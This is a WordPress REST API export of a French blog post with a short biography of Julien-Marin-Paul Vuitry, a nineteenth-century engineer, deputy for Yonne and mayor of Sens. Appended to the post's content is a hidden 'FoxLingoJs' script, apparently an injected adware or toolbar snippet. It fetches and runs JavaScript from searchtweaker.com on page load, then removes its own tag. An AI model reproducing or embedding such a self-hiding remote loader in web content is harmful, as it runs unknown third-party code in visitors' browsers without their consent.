{"id":301,"date":"2013-10-25T21:42:35","date_gmt":"2013-10-25T19:42:35","guid":{"rendered":"http:\/\/www.senon.org\/wordpress\/?p=301"},"modified":"2024-01-28T19:10:28","modified_gmt":"2024-01-28T17:10:28","slug":"julien-marin-paul-vuitry","status":"publish","type":"post","link":"https:\/\/www.senon.org\/wordpress\/julien-marin-paul-vuitry\/","title":{"rendered":"Julien-Marin-Paul VUITRY"},"content":{"rendered":"<p><span style=\"font-family: Arial,Helvetica,sans-serif;\"><span class=\"date\">(1786-1879)<\/span><br \/>\n<span style=\"font-family: Arial,Helvetica,sans-serif;\"><span style=\"font-family: Arial,Helvetica,sans-serif;\"><span style=\"font-family: Arial,Helvetica,sans-serif;\"><span style=\"font-family: Arial,Helvetica,sans-serif;\"><strong><a href=\"http:\/\/fr.wikipedia.org\/wiki\/Julien-Marin-Paul_Vuitry\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" title=\"Wikipedia\" src=\"http:\/\/www.senon.org\/site\/images\/Wikipedia-logo.png\" alt=\"Wikipedia\" width=\"35\" height=\"35\" border=\"0\"><\/a><\/strong><\/span><\/span><\/span><\/span><br \/>\n<\/span>Fils d&rsquo;un avocat et procureur au Parlement de Paris, il entra \u00e0 l&rsquo;\u00c9cole des ponts et chauss\u00e9es, et devint ing\u00e9nieur dans l&rsquo;Yonne o\u00f9 il se fixa. Partisan de la <a title=\"R\u00e9volution de juillet 1830\" href=\"http:\/\/fr.wikipedia.org\/wiki\/R%C3%A9volution_de_juillet_1830\" target=\"_blank\" rel=\"noopener\">r\u00e9volution de juillet 1830<\/a>, il fut d\u00e9put\u00e9 du 4e coll\u00e8ge de l&rsquo;Yonne (Sens) de 1834 \u00e0 1848.<br \/>\nIl prit place dans la majorit\u00e9 minist\u00e9rielle, parla sur les routes et sur les caisses d&rsquo;\u00e9pargne, fut rapporteur du budget du minist\u00e8re du Commerce et des Travaux publics en 1839, du budget en 1841, des lois sur le droit d&rsquo;enregistrement et sur la taxe des lettres, et vota pour le <a href=\"http:\/\/fr.wikipedia.org\/wiki\/Gouvernement_Louis_Mathieu_Mol%C3%A9_%281836-1837%29\" target=\"_blank\" rel=\"noopener\">minist\u00e8re Mol\u00e9<\/a>, pour la dotation du <a title=\"Duc de Nemours\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Duc_de_Nemours\" target=\"_blank\" rel=\"noopener\">duc de Nemours<\/a>, contre les incompatibilit\u00e9s, pour l&rsquo;indemnit\u00e9 <a href=\"http:\/\/fr.wikipedia.org\/wiki\/George_Pritchard\" target=\"_blank\" rel=\"noopener\">Pritchard<\/a>.<br \/>\nMaire de Sens, membre du conseil g\u00e9n\u00e9ral de l&rsquo;Yonne depuis 1841, qu&rsquo;il pr\u00e9side de 1843 \u00e0 1847, membre du conseil g\u00e9n\u00e9ral de l&rsquo;agriculture, il rentra dans la vie priv\u00e9e \u00e0 la <a href=\"http:\/\/fr.wikipedia.org\/wiki\/R%C3%A9volution_fran%C3%A7aise_de_1848\" target=\"_blank\" rel=\"noopener\">r\u00e9volution de 1848<\/a>.<br \/>\nIl est le p\u00e8re d&rsquo;<a title=\"Adolphe Vuitry\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Adolphe_Vuitry\" target=\"_blank\" rel=\"noopener\">Adolphe Vuitry<\/a> et le beau-p\u00e8re de <a title=\"Hugues-I\u00e9na Darcy\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Hugues-I%C3%A9na_Darcy\" target=\"_blank\" rel=\"noopener\">Hugues-I\u00e9na Darcy<\/a>. Sa s\u0153ur \u00e9pousa <a title=\"Claude Bellaigue\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Claude_Bellaigue\" target=\"_blank\" rel=\"noopener\">Claude Bellaigue<\/a>.<\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ <![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();<br \/>\n\/\/ ]]><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>(1786-1879) Fils d&rsquo;un avocat et procureur au Parlement de Paris, il entra \u00e0 l&rsquo;\u00c9cole des ponts et chauss\u00e9es, et devint ing\u00e9nieur dans l&rsquo;Yonne o\u00f9 il se fixa. Partisan de la r\u00e9volution de juillet 1830, il fut d\u00e9put\u00e9 du 4e coll\u00e8ge &hellip; <a href=\"https:\/\/www.senon.org\/wordpress\/julien-marin-paul-vuitry\/\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-301","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/posts\/301","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/comments?post=301"}],"version-history":[{"count":3,"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/posts\/301\/revisions"}],"predecessor-version":[{"id":654,"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/posts\/301\/revisions\/654"}],"wp:attachment":[{"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/media?parent=301"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/categories?post=301"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.senon.org\/wordpress\/wp-json\/wp\/v2\/tags?post=301"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}